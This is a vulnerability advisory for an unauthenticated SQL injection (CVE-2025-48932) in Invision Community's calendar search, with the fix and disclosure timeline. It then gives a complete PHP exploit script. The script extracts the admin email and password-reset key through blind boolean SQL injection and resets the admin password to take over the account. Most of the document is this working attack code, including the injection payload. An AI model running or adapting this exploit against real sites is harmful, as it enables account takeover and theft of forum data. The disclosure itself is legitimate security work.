📄 Invision Community 4.7.20 SQL Injection

----------------------------------------------------------------------------
    Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
    ----------------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://invisioncommunity.com
    
    
    [-] Affected Versions:
    
    Certain 4.x versions before 4.7.21.
    
    
    [-] Vulnerability Description:
    
    The vulnerability is located within the
    /applications/calendar/modules/front/calendar/view.php script.
    Specifically, in the IPS\calendar\modules\front\calendar\view::search()
    method: user input passed through the "location" request parameter is not
    properly sanitized before being used to construct a SQL query. This can be
    exploited by remote, unauthenticated attackers to e.g. read sensitive data
    from the database through boolean-based SQL Injection attacks. Successful
    exploitation of this vulnerability requires the "calendar" application to
    be installed and a "GeoLocation feature" (like Google Maps) to be
    configured.
    
    NOTE: SQL Injection vulnerabilities in Invision Community 4.x might lead to
    admin account takeover and RCE attacks, by resetting the admin's password.
    However, starting from version 4.7.18, a new security encryption key has
    been introduced within the password reset mechanism. As such, this attack
    vector won't work anymore with versions >= 4.7.18.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2025-48932.php
    
    
    [-] Solution:
    
    Upgrade to version 4.7.21 or later.
    
    
    [-] Disclosure Timeline:
    
    [16/05/2025] - Vendor notified
    [27/05/2025] - Version 4.7.21 released
    [28/05/2025] - CVE identifier requested
    [28/05/2025] - CVE identifier assigned
    [23/07/2025] - Public disclosure
    
    
    [-] CVE Reference:
    
    The Common Vulnerabilities and Exposures program (cve.org) has assigned the
    name CVE-2025-48932 to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    http://karmainsecurity.com/KIS-2025-06
    
    
    --- CVE-2025-48932.php poc ---
    
    <?php
    
    /*
        ----------------------------------------------------------------------------
        Invision Community <= 4.7.20 (calendar/view.php) SQL Injection Vulnerability
        ----------------------------------------------------------------------------
    
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://invisioncommunity.com
    
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will be not responsible for any damage. |
        +-------------------------------------------------------------------------+
    
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2025-06
    */
    
    set_time_limit(0);
    error_reporting(E_ERROR);
    
    if (!extension_loaded("curl")) die("[-] cURL extension required!\n");
    
    if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");
    
    $url = $argv[1];
    $ch = curl_init();
    
    @unlink("./cookies.txt");
    
    curl_setopt($ch, CURLOPT_URL, "{$url}");
    curl_setopt($ch, CURLOPT_HEADER, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
    
    if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");
    
    $params = ["app" => "calendar", "module" => "calendar", "controller" => "view", "do" => "search", "form_submitted" => 1, "csrfKey" => $csrf[1]];
    
    function sql_injection($sql)
    {
        global $ch, $params;
    
        $min = true;
        $idx = 1;
    
        while (1)
        {
            $test = 256;
    
            for ($i = 7; $i >= 0; $i--)
            {
                $test = $min ? $test - pow(2, $i) : $test + pow(2, $i);
                $params["location"] = "'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},0x28,0x31)))#";
                curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
                $min = preg_match("/elErrorMessage/", curl_exec($ch));
            }
    
            if (($chr = $min ? $test - 1 : $test) == 0) break;
            $data .= chr($chr);
            $min = true;
            $idx++;
            print "\r[*] Data: {$data}";
        }
    
        return $data;
    }
    
    print "[+] Step 1: fetching admin's e-mail address\n";
    
    $email = sql_injection("SELECT email FROM core_members WHERE member_id=1");
    
    print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter.";
    
    fgets(STDIN);
    
    print "[+] Step 3: fetching the password reset key\n";
    
    $vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1");
    
    print "\n[+] Step 4: taking over the admin account by resetting their password\n";
    
    curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/");
    
    $passwd = md5(time());
    $params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}";
    
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    
    if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n");
    
    print "[+] Pwned! You can now login with {$email}:{$passwd}\n";